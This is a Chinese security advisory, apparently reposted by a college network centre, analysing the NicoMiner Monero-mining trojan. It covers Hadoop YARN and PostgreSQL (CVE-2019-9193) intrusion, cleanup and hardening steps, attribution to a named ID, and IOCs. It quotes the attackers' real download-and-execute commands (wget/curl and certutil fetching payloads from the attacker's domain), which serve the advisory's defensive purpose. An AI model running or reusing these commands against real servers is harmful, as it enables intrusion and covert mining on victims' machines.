潮汕职业技术学院网络与信息化中心移动版

 

概述

国内有关安全研究机构捕获一起快速增长的挖矿木马NicoMiner，该木马通过Hadoop Yarn未授权访问漏洞、PostgreSQL未授权及提权代码执行漏洞（CVE-2019-9193）进行入侵攻击，会根据操作系统不同分别植入Windows和Linux平台的门罗币挖矿木马。

 

由于攻击者使用的域名和样本PDB信息中包含“nico jiang”的ID信息，国内有关安全研究机构将该挖矿木马命名为NicoMiner。根据该挖矿木马使用的钱包算力推算，该木马在近一个月内感染量已翻倍，估计受害服务器已达3000台左右。

 

 

 

进一步溯源分析还发现，“nico jiang”在较早时候已从事黑灰产业，该ID陆续注册了与游戏推广、刷量黑灰产有关的域名，近期启用之前留置的相关网络资源从事挖矿黑产。也不排除近期可能有其他黑客掌控 “nico jiang”曾经注册的相关域名和开发设备，用来制作、传播NicoMiner挖矿木马。

  

   

  

    排查和加固   

    

由于NicoMiner挖矿木马的攻击呈现明显增长趋势，国内有关安全研究机构建议企业参考以下步骤对系统进行排查和加固：

1.删除进程和文件：

文件：

/*/pgsql-*/data/java.*
/*/pgsql/data/java.*
/*/postgres/*/data/LinuxTF
/tmp/java

Windows系统

c:postgresql*dataconhost.exe
c:postgresql*datasqltools.exe
c:windows empst.exe
c:program filespostgresqldatapg*sqltools.exe

检查CPU占用高的进程：

java
LinuxTF
conhost.exe
sqltools.exe

2.加固系统：

Hadoop

1)如果Hadoop环境仅对内网提供服务，请不要将其服务开放到外网可访问。

2)如果必须开启公网访问，Hadoop在2.X以上版本提供了安全认证功能，建议管理员升级并启用Kerberos的认证功能，阻止未经授权的访问。

PostgreSQL

1)修改PostgreSQL的访问配置/data/pgsql/9.3/data/pg_hba.conf，限制不受信任的对象进行访问；

2)谨慎考虑分配pg_read_server_files、pg_write_server_files、pg_execute_server_program 角色权限给数据库客户。

 

 

 

样本分析

 

漏洞入侵

 

1）Hadoop Yarn未授权访问漏洞

 

 

 

Hadoop是一个由Apache基金会所开发的分布式系统基础架构，YARN是hadoop系统上的资源统一管理平台，其主要作用是实现集群资源的统一管理和调度，可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上，通过YARN来管理资源。客户可以向YARN提交特定应用程序进行执行，其中就允许执行相关包含系统命令。

YARN提供有默认开放在8088和8090的REST API（默认前者）允许客户直接通过API进行相关的应用创建、任务提交执行等操作，如果配置不当，REST API将会开放在公网导致未授权访问的问题，攻击者可以在未授权的情况下远程执行代码。

攻击者通过扫描暴露在公网的的8088端口，发现没有开启特定客户安全认证的集群，并通过YARN RESET API提交应用，提交任务的客户名为dr.who。

 

  

攻击者在创建的Hadoop应用中通过Post hxxp://ip:8088/ws/v1/cluster/apps执行恶意命令为：
wget hxxp://raw.nicosoft.org/java && chmod  x java && ./java || curl -O hxxp://raw.nicosoft.org/java && chmod  x java && ./java

该命令从黑客控制的服务器上下载挖矿木马java并启动。

  

 

2）PostgreSQL未授权访问漏洞

PostgreSQL未授权访问漏洞主要是由于管理员配置不当形成的。PostgreSQL配置文件在/data/pgsql/9.3/data/pg_hba.conf，如果管理员没有正确的配置信任的主机，（如下图），则会导致任意客户无需密码均可访问PostgreSQL数据库。

 

 

 

3）PostgreSQL提权代码执行漏洞（CVE-2019-9193）

2019年3月相关安全研究人员披露了PostgreSQL提权代码执行漏洞（CVE-2019-9193）的漏洞细节，具有数据库服务端文件读权限的攻击者利用此漏洞，可执行任意系统命令。

此次披露的漏洞存在于导入导出数据的命令“COPY TO/FROM PROGRAM””中，“pg_read_server_files”组内客户执行上述命令后，可获取数据库超级客户权限，从而执行任意系统命令。该漏洞几乎影响了PostgreSQL的所有版本（从9.3到最新版本），同时也影响了所有的操作系统：Windows，Linux和Mac。

 

受影响PostgreSQL版本：PostgreSQL >=9.3

 

 

 

 

攻击者通过批量扫描5432端口发现PostgreSQL服务器，然后利用未授权访问漏洞获得了PostgreSQL数据库的访问权限，接着再利用PostgreSQL提权代码执行漏洞（CVE-2019-9193）根据不同的系统执行以下恶意命令：

针对Linux系统：

sh -c curl -O hxxp://raw.nicosoft.org/java && chmod +x java && ./java

 

针对Windows系统：

 

 

certutil -urlcache -split -f hxxp://raw.nicosoft.org/conhost.exe conhost.exe&start conhost.exe

 

挖矿

 

入侵Linux系统下载的挖矿木马java：

 

 

 

 

入侵Windows系统后下载的dowanload木马conhost.exe，负责继续下载和启动挖矿木马SqlTools.exe

 

 

 

 

 

挖矿木马SqlTools.exe

 

 

 

挖矿使用矿池：xmr.f2pool.com

两种系统下的挖矿木马使用同一个钱包：

42Pv7VF4etz1dDPkjRWDEec2FVoFzSPDYKCsjNXDdusaTShBZZn6nr8GyNsqu8ekjSU17jmu7h6SfLg1Lr3rrJnHVokCbso

钱包收益：7个XMR

 

过去一个月钱包算力翻番，从150kH/s左右涨到了300kH/s，这也意味着感染的机器翻了一倍，估算在3000台左右。

 

 

 

关联分析

 

分析样本发现，dowanload木马conhost.exe中保留了文件的PDB信息，其中“Nico Jiang”疑似木马作者的ID号。
C:UsersNico Jiangsource eposNicoSoftdReleaseconhost.pdb

 

 

 

通过威胁溯源系统查询木马下载使用的域名“raw.nicosoft.org”，同样发现了注册者的名字为“Nico Jiang”，推测该ID号是攻击者的可能性较高。

 

 

 

通过搜索引擎搜索，发现域名注册的QQ邮箱对应QQ号所有者，在某个论坛接一些批量登录工具的开发需求。  

该ID注册的另一个域名ns-game.top

 

 

 

通过该域名注册使用的outlook邮箱,查询到在github提交的项目，属于相关平台的辅助管理插件：

 

 

 

 

 

 

    总结   

 

从对ID “nico jiang”搜索到的信息来看，可以判断该ID对应的人员是一位软件开发人员，曾经从事一些网站、游戏或知名应用的批量登陆工具，刷量工具的开发，具有一定的灰产属性，而相关记录大都在2016年。

可疑的地方是，注册人显示为”nico jiang”的域名raw.nicosoft.org、ns-game.top的注册时间分别在2017年和2018年，而PDB信息包含”nico jiang”的木马样本conhost.exe编译日期是2021年3月21日（更早的样本也只在2021年2月开始出现），两者相隔较远。

推测可能有两种结论，第一种是”nico jiang”在从事灰产的时候注册了相关域名，并在发现了挖矿具有很大的获利空间之后，转向了制作挖矿木马的黑产，并且使用了之前注册的相关域名来提供下载服务。

第二种是有其他黑产获得了”nico jiang”的域名，以及”nico jiang”所使用过的电脑（PDB路径中的客户名通常是开发机器的客户名）的控制权，并且利用这些资源来开发和传播挖矿木马。根据已有的线索来看，属于第一种情况的可能性较大，国内有关安全研究机构会将相关线索提交给有关部门，以对不法分子进行身份确认和追踪。

 

 

 

 

 

    IOCs   

 

Domain

 

raw.nicosoft.org

IP

 

 

154.91.1.27

Md5

 

 

 

URL

hxxp://raw.nicosoft.org/SqlTools.exe
hxxp://nicosoft.org/SqlTools.exe
hxxp://154.91.1.27/SqlTools.exe
hxxp://nicosoft.org/sqltools.exe
hxxp://154.91.1.27/sqltools.exe
hxxp://raw.nicosoft.org/java
hxxp://raw.nicosoft.org/conhost.exe
hxxp://154.91.1.27/task.exe
hxxp://154.91.1.27/conhost.exe
hxxp://154.91.1.27/WinRing0x64.sys
hxxp://154.91.1.27/LinuxTF

 

参考链接：

 

 

https://s.tencent.com/research/report/1206.html

https://s.tencent.com/research/report/1175.html
https://cloud.tencent.com/developer/article/1472565

 

-END-

文章来源广东省网络安全应急响应中心